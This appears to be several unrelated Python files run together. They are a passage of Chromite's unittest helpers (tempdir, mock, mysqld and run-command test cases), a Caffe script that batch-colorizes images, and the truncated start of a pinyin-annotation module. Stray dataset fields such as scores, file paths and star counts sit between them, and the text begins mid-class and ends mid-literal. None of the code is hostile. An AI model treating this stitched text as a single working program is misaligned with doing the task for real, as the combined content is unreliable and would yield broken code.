    """Pass if requested output(s) ends(end) with an error message."""
    assert check_stdout or check_stderr

    # Only the final non-empty line of each requested stream is examined.
    lines = []
    if check_stdout:
      stdout_lines = self._GetOutputCapt().GetStdoutLines(include_empties=False)
      if stdout_lines:
        lines.append(stdout_lines[-1])
    if check_stderr:
      stderr_lines = self._GetOutputCapt().GetStderrLines(include_empties=False)
      if stderr_lines:
        lines.append(stderr_lines[-1])

    result = self._ContainsMsgLine(lines, check_msg_func)

    # Some extra logic to make an error message useful.
    output_desc = self._GenOutputDescription(check_stdout, check_stderr)

    msg = ('expected %s to end with %s,\nbut did not find it in:\n%s' %
           (output_desc, check_msg_func.description, lines))
    self.assertTrue(result, msg=msg)

  def AssertOutputEndsInError(self, regexp=None,
                              check_stdout=True, check_stderr=False):
    """Assert requested output ends in error line.

    If |regexp| is non-null, then the error line must also match it.

    Raises RuntimeError if output capturing was never on for this test.
    """
    check_msg_func = self._GenCheckMsgFunc(self.ERROR_MSG_RE, regexp)
    return self._AssertOutputEndsInMsg(check_msg_func,
                                       check_stdout, check_stderr)

  def AssertOutputEndsInWarning(self, regexp=None,
                                check_stdout=True, check_stderr=False):
    """Assert requested output ends in warning line.

    If |regexp| is non-null, then the warning line must also match it.

    Raises RuntimeError if output capturing was never on for this test.
    """
    check_msg_func = self._GenCheckMsgFunc(self.WARNING_MSG_RE, regexp)
    return self._AssertOutputEndsInMsg(check_msg_func,
                                       check_stdout, check_stderr)

  def AssertOutputEndsInLine(self, regexp,
                             check_stdout=True, check_stderr=False):
    """Assert requested output ends in line matching |regexp|.

    Raises RuntimeError if output capturing was never on for this test.
    """
    check_msg_func = self._GenCheckMsgFunc(None, regexp)
    return self._AssertOutputEndsInMsg(check_msg_func,
                                       check_stdout, check_stderr)

  def FuncCatchSystemExit(self, func, *args, **kwargs):
    """Run |func| with |args| and |kwargs| and catch SystemExit.

    Return tuple (return value or None, SystemExit number code or None).
    """
    try:
      returnval = func(*args, **kwargs)

      return returnval, None
    except SystemExit as ex:
      # NOTE(review): sys.exit() with no argument produces an empty args
      # tuple, which would make this IndexError — callers appear to always
      # pass an exit code; confirm before relying on bare sys.exit().
      exit_code = ex.args[0]
      return None, exit_code

  def AssertFuncSystemExitZero(self, func, *args, **kwargs):
    """Run |func| with |args| and |kwargs| catching SystemExit.

    If the func does not raise a SystemExit with exit code 0 then assert.
    """
    exit_code = self.FuncCatchSystemExit(func, *args, **kwargs)[1]
    self.assertIsNot(exit_code, None,
                     msg='Expected system exit code 0, but caught none')
    self.assertEqual(exit_code, 0,
                     msg=('Expected system exit code 0, but caught %d' %
                          exit_code))

  def AssertFuncSystemExitNonZero(self, func, *args, **kwargs):
    """Run |func| with |args| and |kwargs| catching SystemExit.

    If the func does not raise a non-zero SystemExit code then assert.
    """
    exit_code = self.FuncCatchSystemExit(func, *args, **kwargs)[1]
    self.assertIsNot(exit_code, None,
                     msg='Expected non-zero system exit code, but caught none')
    self.assertNotEqual(exit_code, 0,
                        msg=('Expected non-zero system exit code, but caught %d'
                             % exit_code))

  def AssertRaisesAndReturn(self, error, func, *args, **kwargs):
    """Like assertRaises, but return exception raised."""
    try:
      func(*args, **kwargs)
      self.fail(msg='Expected %s but got none' % error)
    except error as ex:
      return ex
class TempDirTestCase(TestCase):
  """Mixin used to give each test a tempdir that is cleansed upon finish"""

  # Whether to delete tempdir used by this test. cf: SkipCleanup.
  DELETE = True

  # Holds the shared osutils.TempDir created by SkipCleanup(); all future
  # per-test tempdirs are created (and leaked) inside it.
  _NO_DELETE_TEMPDIR_OBJ = None

  def __init__(self, *args, **kwargs):
    TestCase.__init__(self, *args, **kwargs)
    # Path to this test's temporary directory; populated in setUp.
    self.tempdir = None
    self._tempdir_obj = None

  @classmethod
  def SkipCleanup(cls):
    """Leave behind tempdirs created by instances of this class.

    Calling this function ensures that all future instances will leak their
    temporary directories. Additionally, all future temporary directories will
    be created inside one top level temporary directory, so that you can easily
    blow them away when you're done.

    Currently, this function is pretty stupid. You should call it *before*
    creating any instances.

    Returns:
      Path to a temporary directory that contains all future temporary
      directories created by instances of this class.
    """
    cls.DELETE = False
    cls._NO_DELETE_TEMPDIR_OBJ = osutils.TempDir(
        prefix='chromite.test_no_cleanup',
        set_global=True,
        delete=cls.DELETE)
    logging.info('%s requested to SkipCleanup. Will leak %s',
                 cls.__name__, cls._NO_DELETE_TEMPDIR_OBJ.tempdir)
    return cls._NO_DELETE_TEMPDIR_OBJ.tempdir

  def setUp(self):
    self._tempdir_obj = osutils.TempDir(prefix='chromite.test', set_global=True,
                                        delete=self.DELETE)
    self.tempdir = self._tempdir_obj.tempdir

    # We must use addCleanup here so that inheriting TestCase classes can use
    # addCleanup with the guarantee that the tempdir will be cleand up _after_
    # their addCleanup has run. TearDown runs before cleanup functions.
    self.addCleanup(self._CleanTempDir)

  def _CleanTempDir(self):
    if self._tempdir_obj is not None:
      self._tempdir_obj.Cleanup()
      self._tempdir_obj = None
      self.tempdir = None

  def ExpectRootOwnedFiles(self):
    """Tells us that we may need to clean up root owned files."""
    if self._tempdir_obj is not None:
      self._tempdir_obj.SetSudoRm()

  def assertFileContents(self, file_path, content):
    """Assert that the file contains the given content."""
    self.assertExists(file_path)
    read_content = osutils.ReadFile(file_path)
    self.assertEqual(read_content, content)

  def assertTempFileContents(self, file_path, content):
    """Assert that a file in the temp directory contains the given content."""
    self.assertFileContents(os.path.join(self.tempdir, file_path), content)

  def ReadTempFile(self, path):
    """Read a given file from the temp directory.

    Args:
      path: The path relative to the temp directory to read.
    """
    return osutils.ReadFile(os.path.join(self.tempdir, path))

  def WriteTempFile(self, path, content, **kwargs):
    """Write the given content to the temp directory

    Args:
      path: The path relative to the temp directory to write to.
      content: Content to write. May be either an iterable, or a string.
      kwargs: Additional args to pass to osutils.WriteFile.
    """
    osutils.WriteFile(os.path.join(self.tempdir, path), content, **kwargs)
class LocalSqlServerTestCase(TempDirTestCase):
  """A TestCase that launches a local mysqld server in the background.

  - This test must run inside the chroot.
  - This class provides attributes:
    - mysqld_host: The IP of the local mysqld server.
    - mysqld_port: The port of the local mysqld server.
  """

  # Neither of these are in the PATH for a non-sudo user.
  MYSQL_INSTALL_DB = '/usr/share/mysql/scripts/mysql_install_db'
  MYSQLD = '/usr/sbin/mysqld'
  MYSQLD_SHUTDOWN_TIMEOUT_S = 30

  def __init__(self, *args, **kwargs):
    TempDirTestCase.__init__(self, *args, **kwargs)
    self.mysqld_host = None
    self.mysqld_port = None
    self._mysqld_dir = None
    self._mysqld_runner = None
    # This class has assumptions about the mariadb installation that are only
    # guaranteed to hold inside the chroot.
    cros_build_lib.AssertInsideChroot()

  def setUp(self):
    """Launch mysqld in a clean temp directory."""
    self._mysqld_dir = os.path.join(self.tempdir, 'mysqld_dir')
    osutils.SafeMakedirs(self._mysqld_dir)
    mysqld_tmp_dir = os.path.join(self._mysqld_dir, 'tmp')
    osutils.SafeMakedirs(mysqld_tmp_dir)
    # MYSQL_INSTALL_DB is stupid.  It can't parse '--flag value'.
    # Must give it options in '--flag=value' form.
    cmd = [
        self.MYSQL_INSTALL_DB,
        '--no-defaults',
        '--basedir=/usr',
        '--ldata=%s' % self._mysqld_dir,
    ]
    cros_build_lib.run(cmd, quiet=True)

    self.mysqld_host = '127.0.0.1'
    self.mysqld_port = remote_access.GetUnusedPort()
    cmd = [
        self.MYSQLD,
        '--no-defaults',
        '--datadir', self._mysqld_dir,
        '--socket', os.path.join(self._mysqld_dir, 'mysqld.socket'),
        '--port', str(self.mysqld_port),
        '--pid-file', os.path.join(self._mysqld_dir, 'mysqld.pid'),
        '--tmpdir', mysqld_tmp_dir,
    ]
    # Run mysqld as a single background task; halt_on_error surfaces crashes.
    self._mysqld_runner = parallel.BackgroundTaskRunner(
        cros_build_lib.run,
        processes=1,
        halt_on_error=True)
    queue = self._mysqld_runner.__enter__()
    queue.put((cmd,))
    self.addCleanup(self._ShutdownMysqld)

    # Ensure that the Sql server is up before continuing.
    cmd = [
        'mysqladmin',
        '-S', os.path.join(self._mysqld_dir, 'mysqld.socket'),
        'ping',
    ]
    try:
      # Retry at:
      # 1 + 2 + 4 + 8 + 16 + 32 + 64 + 128 = 255 seconds total timeout in
      # case of failure.
      # Smaller timeouts make this check flaky on heavily loaded builders.
      retry_util.RunCommandWithRetries(cmd=cmd, quiet=True, max_retry=8,
                                       sleep=1, backoff_factor=2)
    except Exception as e:
      # Ping never succeeded: make sure the runner is still torn down.
      self.addCleanup(lambda: self._CleanupMysqld(
          'mysqladmin failed to ping mysqld: %s' % e))
      raise

  def _ShutdownMysqld(self):
    """Cleanup mysqld and our mysqld data directory."""
    if self._mysqld_runner is None:
      return
    try:
      cmd = [
          'mysqladmin',
          '-S', os.path.join(self._mysqld_dir, 'mysqld.socket'),
          '-u', 'root',
          'shutdown',
      ]
      cros_build_lib.run(cmd, quiet=True)
    except cros_build_lib.RunCommandError as e:
      self._CleanupMysqld(
          failure='mysqladmin failed to shutdown mysqld: %s' % e)
    else:
      self._CleanupMysqld()

  def _CleanupMysqld(self, failure=None):
    """Exit the background runner, forwarding |failure| (if any) into it."""
    if self._mysqld_runner is None:
      return
    try:
      if failure is not None:
        self._mysqld_runner.__exit__(
            Exception,
            '%s. We force killed the mysqld process.' % failure,
            None,
        )
      else:
        self._mysqld_runner.__exit__(None, None, None)
    finally:
      self._mysqld_runner = None
class FakeSDKCache(object):
  """Creates a fake SDK Cache."""

  def __init__(self, cache_dir, sdk_version='12225.0.0'):
    """Creates a fake SDK Cache.

    Args:
      cache_dir: The top level cache directory to use.
      sdk_version: The SDK Version.
    """
    self.cache_dir = cache_dir
    # Sets the SDK Version.
    self.sdk_version = sdk_version
    # NOTE(review): the env var name '%SDK_VERSION' (leading '%') looks like
    # a typo for 'SDK_VERSION' — confirm against consumers before changing.
    os.environ['%SDK_VERSION'] = sdk_version
    # Defines the path for the fake SDK Symlink Cache.  (No backing tarball
    # cache is needed.)
    self.symlink_cache_path = os.path.join(self.cache_dir, 'chrome-sdk',
                                           'symlinks')
    # Creates an SDK SymlinkCache instance.
    self.symlink_cache = cache.DiskCache(self.symlink_cache_path)

  def CreateCacheReference(self, board, key):
    """Creates the Cache Reference.

    Args:
      board: The board to use.
      key: The key of the item in the tarball cache.

    Returns:
      Path to the cache directory.
    """
    # Adds the cache path at the key.
    return self.symlink_cache.Lookup((board, self.sdk_version, key)).path
class MockTestCase(TestCase):
  """Python-mock based test case; compatible with StackedSetup"""

  def setUp(self):
    # Patchers started via StartPatcher(); stopped (in reverse) in tearDown.
    self._patchers = []

  def tearDown(self):
    # We can't just run stopall() by itself, and need to stop our patchers
    # manually since stopall() doesn't handle repatching.
    cros_build_lib.SafeRun([p.stop for p in reversed(self._patchers)] +
                           [mock.patch.stopall])

  def StartPatcher(self, patcher):
    """Call start() on the patcher, and stop() in tearDown."""
    m = patcher.start()
    self._patchers.append(patcher)
    return m

  def PatchObject(self, *args, **kwargs):
    """Create and start a mock.patch.object().

    stop() will be called automatically during tearDown.
    """
    return self.StartPatcher(mock.patch.object(*args, **kwargs))

  def PatchDict(self, *args, **kwargs):
    """Create and start a mock.patch.dict().

    stop() will be called automatically during tearDown.
    """
    return self.StartPatcher(mock.patch.dict(*args, **kwargs))
# MockTestCase must be before TempDirTestCase in this inheritance order,
# because MockTestCase.StartPatcher() calls may be for PartialMocks, which
# create their own temporary directory. The teardown for those directories
# occurs during MockTestCase.tearDown(), which needs to be run before
# TempDirTestCase.tearDown().
class MockTempDirTestCase(MockTestCase, TempDirTestCase):
  """Convenience class mixing TempDir and Mock (mock teardown runs first)."""
class MockOutputTestCase(MockTestCase, OutputTestCase):
  """Convenience class mixing Output and Mock."""
class ProgressBarTestCase(MockOutputTestCase):
  """Test class to test the progress bar."""

  # pylint: disable=protected-access

  def setUp(self):
    # Pin the reported terminal size (and force a tty) so progress-bar
    # output is deterministic across environments.
    self._terminal_size = self.PatchObject(
        operation.ProgressBarOperation, '_GetTerminalSize',
        return_value=operation._TerminalSize(100, 20))
    self.PatchObject(os, 'isatty', return_value=True)

  def SetMockTerminalSize(self, width, height):
    """Set mock terminal's size."""
    self._terminal_size.return_value = operation._TerminalSize(width, height)

  def AssertProgressBarAllEvents(self, num_events):
    """Check that the progress bar generates expected events."""
    skipped = 0
    for i in range(num_events):
      try:
        self.AssertOutputContainsLine('%d%%' % (i * 100 // num_events))
      except AssertionError:
        skipped += 1

    # crbug.com/560953 It's normal to skip a few events under heavy CPU load.
    self.assertLessEqual(skipped, num_events // 2,
                         'Skipped %s of %s progress updates' %
                         (skipped, num_events))

    self.AssertOutputContainsLine('100%')
class MockLoggingTestCase(MockTestCase, LoggingTestCase):
  """Convenience class mixing Logging and Mock."""
@contextlib.contextmanager
def SetTimeZone(tz):
  """Context manager that temporarily switches the process timezone to |tz|.

  Needed because cros_test_lib.TestCase does not call time.tzset() after
  resetting the environment, so a plain TZ change would not take effect.
  """
  saved_environ = os.environ.copy()
  try:
    os.environ['TZ'] = tz
    time.tzset()
    yield
  finally:
    osutils.SetEnvironment(saved_environ)
    time.tzset()
class ListTestSuite(unittest.BaseTestSuite):
  """Stub test suite to list all possible tests"""

  # We hack in |top| for local recursive usage.
  # pylint: disable=arguments-differ
  def run(self, result, _debug=False, top=True):
    """List all the tests this suite would have run."""
    # Recursively build a list of all the tests and the descriptions.
    # We do this so we can align the output when printing.
    tests = []

    # Walk all the tests that this suite itself holds.
    for test in self:
      if isinstance(test, type(self)):
        # Nested ListTestSuite: recurse and collect its (id, desc) pairs.
        tests += test(result, top=False)
      else:
        desc = test.shortDescription()
        if desc is None:
          desc = ''
        tests.append((test.id(), desc))

    if top:
      if tests:
        # Now that we have all the tests, print them in lined up columns.
        maxlen = max(len(x[0]) for x in tests)
        for test, desc in tests:
          print('%-*s %s' % (maxlen, test, desc))
      return result
    else:
      # Recursive call: hand the collected pairs back to the caller.
      return tests
class ListTestLoader(unittest.TestLoader):
  """Stub test loader to list all possible tests"""

  # Load tests into ListTestSuite so "running" them only lists their names.
  suiteClass = ListTestSuite
class ListTestRunner(object):
  """Test runner stub that enumerates tests instead of executing them."""

  def run(self, test):
    """Invoke |test| with a fresh TestResult and return that result."""
    outcome = unittest.TestResult()
    test(outcome)
    return outcome
class TraceTestRunner(unittest.TextTestRunner):
  """Test runner that traces the test code as it runs

  We insert tracing at the test runner level rather than test suite or test
  case because both of those can execute code we've written (e.g. setUpClass
  and setUp), and we want to trace that code too.
  """

  # Keyword arguments for trace.Trace; filled in by TestProgram.parseArgs().
  TRACE_KWARGS = {}

  def run(self, test):
    # Lazy import: tracing support is only needed when --trace is used.
    import trace
    tracer = trace.Trace(**self.TRACE_KWARGS)
    return tracer.runfunc(unittest.TextTestRunner.run, self, test)
class ProfileTestRunner(unittest.TextTestRunner):
  """Test runner that profiles the test code as it runs

  We insert profiling at the test runner level rather than test suite or test
  case because both of those can execute code we've written (e.g. setUpClass
  and setUp), and we want to profile that code too.  It might be unexpectedly
  heavy by invoking expensive setup logic.
  """

  # Keyword arguments for cProfile.Profile; filled in by TestProgram.
  PROFILE_KWARGS = {}

  # pstats sort keys used when printing the profile; filled in by TestProgram.
  SORT_STATS_KEYS = ()

  def run(self, test):
    # Lazy imports: profiling support is only needed when --profile is used.
    import cProfile
    profiler = cProfile.Profile(**self.PROFILE_KWARGS)
    ret = profiler.runcall(unittest.TextTestRunner.run, self, test)

    import pstats
    stats = pstats.Stats(profiler, stream=sys.stderr)
    stats.strip_dirs().sort_stats(*self.SORT_STATS_KEYS).print_stats()

    return ret
class TestProgram(unittest.TestProgram):
  """Helper wrapper around unittest.TestProgram

  Any passed in kwargs are passed directly down to unittest.main; via this,
  you can inject custom argv for example (to limit what tests run).
  """

  def __init__(self, **kwargs):
    # Our custom 'level' kwarg sets the default logging verbosity; it must be
    # popped before forwarding to unittest.TestProgram.
    self.default_log_level = kwargs.pop('level', 'critical')
    # Set by parseArgs() when --no-wipe leaks the temp working directory.
    self._leaked_tempdir = None
    try:
      super(TestProgram, self).__init__(**kwargs)
    finally:
      if GlobalTestConfig.NETWORK_TESTS_SKIPPED:
        print('Note: %i network test(s) skipped; use --network to run them.' %
              GlobalTestConfig.NETWORK_TESTS_SKIPPED)

  def parseArgs(self, argv):
    """Parse the command line for the test"""
    description = """Examples:
%(prog)s - run default set of tests
%(prog)s MyTestSuite - run suite MyTestSuite
%(prog)s MyTestCase.testSomething - run MyTestCase.testSomething
%(prog)s MyTestCase - run all MyTestCase.test* methods
"""
    parser = commandline.ArgumentParser(
        description=description, default_log_level=self.default_log_level)

    # These are options the standard unittest.TestProgram supports.
    parser.add_argument('-q', '--quiet', default=False, action='store_true',
                        help='Minimal output')
    parser.add_argument('-f', '--failfast', default=False, action='store_true',
                        help='Stop on first failure')
    parser.add_argument('tests', nargs='*',
                        help='specific test classes or methods to run')
    parser.add_argument('-c', '--catch', default=False, action='store_true',
                        help='Catch control-C and display results')
    parser.add_argument('-b', '--buffer', default=False, action='store_true',
                        help='Buffer stdout and stderr during test runs')

    # These are custom options we added.
    parser.add_argument('-l', '--list', default=False, action='store_true',
                        help='List all the available tests')
    parser.add_argument('--network', default=False, action='store_true',
                        help='Run tests that depend on good network '
                             'connectivity')
    parser.add_argument('--no-wipe', default=True, action='store_false',
                        dest='wipe',
                        help='Do not wipe the temporary working directory '
                             '(default is to always wipe)')
    parser.add_argument('-u', '--update', default=False, action='store_true',
                        help='Update generated test files as needed.')

    # Note: The tracer module includes coverage options ...
    group = parser.add_argument_group('Tracing options')
    group.add_argument('--trace', default=False, action='store_true',
                       help='Trace test execution')
    group.add_argument('--ignore-module', default='',
                       help='Ignore the specified modules (comma delimited)')
    group.add_argument('--ignore-dir', default='',
                       help='Ignore modules/packages in the specified dirs '
                            '(comma delimited)')
    group.add_argument('--no-ignore-system', default=True, action='store_false',
                       dest='ignore_system',
                       help='Do not ignore sys paths automatically')

    group = parser.add_argument_group('Profiling options')
    group.add_argument('--profile', default=False, action='store_true',
                       help='Profile test execution')
    group.add_argument('--profile-sort-keys', default='time',
                       help='Keys to sort stats by (comma delimited)')
    group.add_argument('--no-profile-builtins', default=True,
                       action='store_false', dest='profile_builtins',
                       help='Do not profile builtin functions')

    opts = parser.parse_args(argv[1:])
    opts.Freeze()

    # Process the common options first.
    if opts.verbose:
      self.verbosity = 2
    if opts.quiet:
      self.verbosity = 0
    if opts.failfast:
      self.failfast = True
    if opts.catch:
      self.catchbreak = True
    if opts.buffer:
      self.buffer = True

    # Then handle the chromite extensions.
    if opts.network:
      GlobalTestConfig.RUN_NETWORK_TESTS = True
    if opts.update:
      GlobalTestConfig.UPDATE_GENERATED_FILES = True

    # We allow --list because it's nice to be able to throw --list onto an
    # existing command line to quickly get the output.  It's clear to users
    # that it does nothing else.
    if sum((opts.trace, opts.profile)) > 1:
      parser.error('--trace/--profile are exclusive')

    if opts.list:
      self.testRunner = ListTestRunner
      self.testLoader = ListTestLoader()
    elif opts.trace:
      self.testRunner = TraceTestRunner
      # Create the automatic ignore list based on sys.path.  We need to
      # filter out chromite paths though as we might have automatic local
      # paths in it.
      auto_ignore = set()
      if opts.ignore_system:
        auto_ignore.add(os.path.join(constants.CHROMITE_DIR, 'third_party'))
        for path in sys.path:
          path = os.path.realpath(path)
          if path.startswith(constants.CHROMITE_DIR):
            continue
          auto_ignore.add(path)

      TraceTestRunner.TRACE_KWARGS = {
          # Disable counting as it only applies to coverage collection.
          'count': False,
          # Enable tracing support since that's what we want w/--trace.
          'trace': True,
          # Enable relative timestamps before each traced line.
          'timing': True,
          'ignoremods': opts.ignore_module.split(','),
          'ignoredirs': set(opts.ignore_dir.split(',')) | auto_ignore,
      }
    elif opts.profile:
      self.testRunner = ProfileTestRunner
      ProfileTestRunner.PROFILE_KWARGS = {
          'subcalls': True,
          'builtins': opts.profile_builtins,
      }
      ProfileTestRunner.SORT_STATS_KEYS = opts.profile_sort_keys.split(',')

    # Figure out which tests the user/unittest wants to run.
    if not opts.tests and self.defaultTest is None:
      self.testNames = None
    elif opts.tests:
      self.testNames = opts.tests
    else:
      self.testNames = (self.defaultTest,)

    if not opts.wipe:
      # Instruct the TempDirTestCase to skip cleanup before actually creating
      # any tempdirs.
      self._leaked_tempdir = TempDirTestCase.SkipCleanup()

    self.createTests()

  def runTests(self):
    """Run the selected tests, with cidb stubbed out if it was imported."""
    # If cidb has been imported, stub it out.  We do this dynamically so we
    # don't have to import cidb in every single test module.
    if 'chromite.lib.cidb' in sys.modules:
      # Unit tests should never connect to the live prod or debug instances
      # of the cidb.  This call ensures that they will not accidentally
      # do so through the normal cidb SetUp / GetConnectionForBuilder factory.
      sys.modules['chromite.lib.cidb'].CIDBConnectionFactory.SetupMockCidb()
    try:
      super(TestProgram, self).runTests()
    finally:
      if self._leaked_tempdir is not None:
        logging.info('Working directory %s left behind. Please cleanup later.',
                     self._leaked_tempdir)
class PopenMock(partial_mock.PartialCmdMock):
  """Provides a context where all _Popen instances are low-level mocked."""

  TARGET = 'chromite.lib.cros_build_lib._Popen'
  ATTRS = ('__init__',)
  DEFAULT_ATTR = '__init__'

  def __init__(self):
    partial_mock.PartialCmdMock.__init__(self, create_tempdir=True)

  def _target__init__(self, inst, cmd, *args, **kwargs):
    """Replace |cmd| with a generated shell script replaying the mock result."""
    result = self._results['__init__'].LookupResult(
        (cmd,), hook_args=(inst, cmd,) + args, hook_kwargs=kwargs)

    script = os.path.join(self.tempdir, 'mock_cmd.sh')
    stdout = os.path.join(self.tempdir, 'output')
    stderr = os.path.join(self.tempdir, 'error')

    # This encoding handling might appear a bit wonky, but it's OK, I promise.
    # The purpose of this mock is to stuff data into files so that we can run
    # a fake script in place of the real command.  So any cros_build_lib.run()
    # settings will still be fully checked including encoding.  This code just
    # takes care of writing the data from AddCmdResult objects.  Those might
    # be specified in strings or in bytes, but there's no value in forcing all
    # code to use the same encoding with the mocks.
    def _MaybeEncode(src):
      return src.encode('utf-8') if isinstance(src, six.text_type) else src

    osutils.WriteFile(stdout, _MaybeEncode(result.output), mode='wb')
    osutils.WriteFile(stderr, _MaybeEncode(result.error), mode='wb')
    osutils.WriteFile(
        script,
        ['#!/bin/bash\n', 'cat %s\n' % stdout, 'cat %s >&2\n' % stderr,
         'exit %s' % result.returncode])
    os.chmod(script, 0o700)

    # Run the fake command from the mock's tempdir.
    kwargs['cwd'] = self.tempdir
    self.backup['__init__'](inst, [script, '--'] + cmd, *args, **kwargs)
class RunCommandMock(partial_mock.PartialCmdMock):
  """Provides a context where all run invocations are low-level mocked."""

  TARGET = 'chromite.lib.cros_build_lib'
  ATTRS = ('run',)
  DEFAULT_ATTR = 'run'

  def run(self, cmd, *args, **kwargs):
    """Look up the configured result for |cmd| and replay it via PopenMock."""
    result = self._results['run'].LookupResult(
        (cmd,), kwargs=kwargs, hook_args=(cmd,) + args, hook_kwargs=kwargs)

    popen_mock = PopenMock()
    popen_mock.AddCmdResult(partial_mock.Ignore(), result.returncode,
                            result.output, result.error)
    with popen_mock:
      return self.backup['run'](cmd, *args, **kwargs)

  # Backwards compat API.
  RunCommand = run
class RunCommandTestCase(MockTestCase):
  """MockTestCase that mocks out run by default."""

  def setUp(self):
    self.rc = self.StartPatcher(RunCommandMock())
    self.rc.SetDefaultCmdResult()
    # Re-export the mock's assertion helpers for convenient use by tests.
    self.assertCommandCalled = self.rc.assertCommandCalled
    self.assertCommandContains = self.rc.assertCommandContains

    # These ENV variables affect run behavior, hide them.
    self._old_envs = {e: os.environ.pop(e) for e in constants.ENV_PASSTHRU
                      if e in os.environ}

  def tearDown(self):
    # Restore hidden ENVs.  setUp may not have completed (e.g. an earlier
    # failure), hence the hasattr guard.
    if hasattr(self, '_old_envs'):
      os.environ.update(self._old_envs)
class RunCommandTempDirTestCase(RunCommandTestCase, TempDirTestCase):
  """Convenience class mixing TempDirTestCase and RunCommandTestCase"""
# The lowercase class name is deliberate so call sites read like
# unittest.main().
class main(TestProgram):
  """Chromite's version of unittest.main.  Invoke this, not unittest.main."""
| 1.90625 | 2 |
colorize.py | sergekatzmann/batch_colorize | 2 | 12766769 | <gh_stars>1-10
#!/usr/bin/python
import os
os.environ['GLOG_minloglevel'] = '2'
import time
import numpy as np
import caffe
import skimage.color as color
import scipy
import scipy.ndimage.interpolation as sni
from os import listdir
from os.path import isfile, join
import sys, getopt
class bcolors:
    """ANSI terminal escape codes used for colored console output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset all attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
def colorizeFile(input, output):
    """Colorize one image with the pre-trained Caffe colorization network.

    Args:
        input: path to the source image (its L channel drives the network).
        output: path the colorized RGB image is written to.
    """
    # NOTE(review): the Caffe network is reloaded from disk on every call;
    # caching it at module level would speed up batch runs considerably.
    caffemodel = 'colorization_release_v0.caffemodel'
    prototxt = 'colorization_deploy_v0.prototxt'
    net = caffe.Net(prototxt, caffemodel, caffe.TEST)
    (H_in, W_in) = net.blobs['data_l'].data.shape[2:]  # get input shape
    (H_out, W_out) = net.blobs['class8_ab'].data.shape[2:]  # get output shape
    net.blobs['Trecip'].data[...] = 6 / np.log(10)  # 1/T, set annealing temperature
    # (We found that we had introduced a factor of log(10). We will update the arXiv shortly.)
    # load the original image
    img_rgb = caffe.io.load_image(input)
    img_lab = color.rgb2lab(img_rgb)  # convert image to lab color space
    img_l = img_lab[:, :, 0]  # pull out L channel
    (H_orig, W_orig) = img_rgb.shape[:2]  # original image size
    # resize image to network input size
    img_rs = caffe.io.resize_image(img_rgb, (H_in, W_in))
    img_lab_rs = color.rgb2lab(img_rs)
    img_l_rs = img_lab_rs[:, :, 0]
    net.blobs['data_l'].data[0, 0, :, :] = img_l_rs - 50  # subtract 50 for mean-centering
    net.forward()  # run network
    ab_dec = net.blobs['class8_ab'].data[0, :, :, :].transpose((1, 2, 0))  # this is our result
    ab_dec_us = sni.zoom(ab_dec,
                         (1. * H_orig / H_out, 1. * W_orig / W_out, 1))  # upsample to match size of original image L
    img_lab_out = np.concatenate((img_l[:, :, np.newaxis], ab_dec_us), axis=2)  # concatenate with original image L
    img_rgb_out = np.clip(color.lab2rgb(img_lab_out), 0, 1)  # convert back to rgb
    scipy.misc.imsave(output, img_rgb_out)
    return;
def colorizeDir(inputDir, outputDir):
    """Colorize every regular file found directly inside inputDir.

    Each image <name><ext> is colorized and written to outputDir as
    <name>_color<ext>.  The '.gitkeep' placeholder file is skipped.

    Args:
        inputDir: directory containing the input images.
        outputDir: directory that receives the colorized output images.
    """
    imagefiles = [f for f in listdir(inputDir) if isfile(join(inputDir, f))]
    for image in imagefiles:
        if image == '.gitkeep':
            continue
        (imageName, imageExt) = os.path.splitext(os.path.basename(image))
        # Bug fix: build paths with join() instead of raw string concatenation,
        # which silently produced wrong paths unless the caller passed a
        # trailing slash.  Also avoid shadowing the 'input' builtin.
        src = join(inputDir, image)
        dst = join(outputDir, imageName + '_color' + imageExt)
        print("Processing file:")
        print("input =" + src)
        print("output =" + dst)
        start = time.time()
        colorizeFile(src, dst)
        end = time.time()
        print("Duration: %.0f" % (end - start))
def printColor(message, color):
    """Print |message| wrapped in the given ANSI color code, then reset."""
    print color + message + bcolors.ENDC
def printGreen(message):
    """Print |message| in green (used for informational output)."""
    printColor(message, bcolors.OKGREEN)
def printError(message):
    """Print |message| in red (used for error output)."""
    printColor(message, bcolors.FAIL)
def usage():
    """Print the command line usage help in green."""
    printGreen('Usage:')
    printGreen('colorize.py -i <inputdirectory> -o <outputdirectory>')
def main(argv):
    """Parse command line options and colorize every image in the input dir.

    Args:
        argv: argument list without the program name, e.g. sys.argv[1:].

    Exits with status 2 on bad usage, 3 when a directory does not exist and
    4 when a directory has insufficient permissions.
    """
    inputDir = ''
    outputDir = ''
    try:
        opts, args = getopt.getopt(argv, "hi:o:", ["idir=", "odir="])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            usage()
            sys.exit()
        elif opt in ("-i", "--idir"):
            inputDir = arg
        elif opt in ("-o", "--odir"):
            outputDir = arg
    if (inputDir == '' or outputDir == ''):
        usage()
        sys.exit(2)
    if (not os.path.isdir(inputDir)):
        printError('Can not locate input directory "' + inputDir + '"')
        sys.exit(3)
    if (not os.path.isdir(outputDir)):
        printError('Can not locate output directory "' + outputDir + '"')
        sys.exit(3)
    # Bug fix: this readability check previously tested outputDir although the
    # message (and the intent) refer to the input directory.
    if (not os.access(inputDir, os.R_OK)):
        printError('The input directory "' + inputDir + '" is not readable')
        sys.exit(4)
    if (not os.access(outputDir, os.W_OK)):
        printError('The output directory "' + outputDir + '" is not writeable')
        sys.exit(4)
    colorizeDir(inputDir, outputDir)
    return
if __name__ == "__main__":
    # Strip the program name before handing the arguments to main().
    main(sys.argv[1:])
| 1.992188 | 2 |
src/pinyiniser/main.py | mldelaney94/pinyiniser | 0 | 12766770 | <filename>src/pinyiniser/main.py
import jieba
import pinyiniser
import os
from pathlib import Path
# Directory containing the installed pinyiniser package.
# NOTE(review): the '\\' separators make this Windows-specific;
# os.path.dirname(pinyiniser.__file__) would be portable — confirm intent.
curr_dir = '\\'.join(pinyiniser.__file__.split('\\')[0:-1])
# Bundled CC-CEDICT data files: numeric-tone and diacritic-tone variants.
numeric_dict = os.path.join(curr_dir, Path('./data/cedict_ts_no_space_numerals.u8'))
diacritic_dict = os.path.join(curr_dir, Path('./data/cedict_ts_pinyin.u8'))

# Tokens passed through verbatim (never looked up in the dictionary) and
# attached without a separating space when the pinyin output is assembled.
do_not_parse_set = {
    # Chinese special chars
